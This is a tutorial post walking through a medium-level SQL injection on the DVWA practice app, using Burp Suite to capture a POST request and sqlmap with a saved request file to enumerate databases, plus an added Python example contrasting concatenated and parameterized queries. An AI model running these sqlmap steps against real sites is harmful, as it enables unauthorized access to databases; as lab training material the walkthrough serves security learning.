Medium-level SQL injection attack on a website with sqlmap and Burp Suite

We have already seen a low-level attack on a database with sqlmap in a previous post. Now we will look at a medium-level SQL injection attack.

First set DVWA to medium, go to the SQL Injection tab and send the request. The request now goes out with the POST method, so we can't append any string to the URL. In this type of case we need an extra tool to capture the request and repeat the same request with different data.

We will use Burp Suite.

1. I captured the request by setting the proxy.
2. Send it to the Repeater module, modify id and send it again.
3. It shows the SQL error that we are expecting.
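Why the error in step 3 appears even though id now travels in the POST body, and what the fix looks like on the application side, as an added example that is not code from the original post or from DVWA. It assumes an in-memory SQLite table in place of the MySQL backend; the table, function names and request bodies are constructed for illustration.

```python
import sqlite3
from urllib.parse import parse_qs

# Constructed sample data: an in-memory SQLite table stands in for the
# application's users table (assumption; the lab's real backend is MySQL).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, first_name TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", [(1, "admin"), (2, "gordon")])
    return db

def post_field(body, name):
    """Return one field from an application/x-www-form-urlencoded POST body."""
    return parse_qs(body, keep_blank_values=True).get(name, [""])[0]

def lookup_concatenated(db, body):
    """Weak form: the POST value is pasted straight into the SQL text."""
    user_id = post_field(body, "id")
    try:
        rows = db.execute(
            "SELECT first_name FROM users WHERE user_id = " + user_id
        ).fetchall()
        return ("ok", rows)
    except sqlite3.Error as exc:
        # A database error caused by client input: the symptom seen in step 3.
        return ("sql-error", str(exc))

def lookup_parameterized(db, body):
    """Hardened form: validate the type, then bind the value as a parameter."""
    user_id = post_field(body, "id")
    if not user_id.isdecimal():
        return ("rejected", [])
    rows = db.execute(
        "SELECT first_name FROM users WHERE user_id = ?", (int(user_id),)
    ).fetchall()
    return ("ok", rows)

if __name__ == "__main__":
    db = make_db()
    # Constructed bodies: a normal id, and an id with a stray quote (%27).
    for body in ("id=1&Submit=Submit", "id=1%27&Submit=Submit"):
        print(body, lookup_concatenated(db, body), lookup_parameterized(db, body))
```

Moving the parameter from the URL to the request body changes only where the value is carried; the query is safe only when the value is bound rather than concatenated.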

But now we have a challenge: how can we pass a URL to sqlmap when id is in a different position and not in the URL?

We have to use another technique: copy the raw request data, paste it into a text file and save it as request.txt (you can choose your own file name).

Run the command below.

sqlmap -r request.txt -p id --dbs

-r: the request file
-p: the injectable parameter
--dbs: enumerate the databases

Now let's run it.

[23:50:03] [INFO] fetching database names
[23:50:03] [INFO] the SQL query used returns 7 entries
[23:50:03] [INFO] resumed: dvwa
[23:50:03] [INFO] resumed: information_schema
[23:50:03] [INFO] resumed: mysql
[23:50:03] [INFO] resumed: performance_schema
[23:50:03] [INFO] resumed: buyback
[23:50:03] [INFO] resumed: pk
[23:50:03] [INFO] resumed: wptest
available databases [7]:
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] buyback
[*] pk
[*] wptest

We successfully retrieved the databases. A separate post covers in detail how to send a POST request with sqlmap. After this, we follow the same steps as in the previous video to get the tables and the table data of the database.
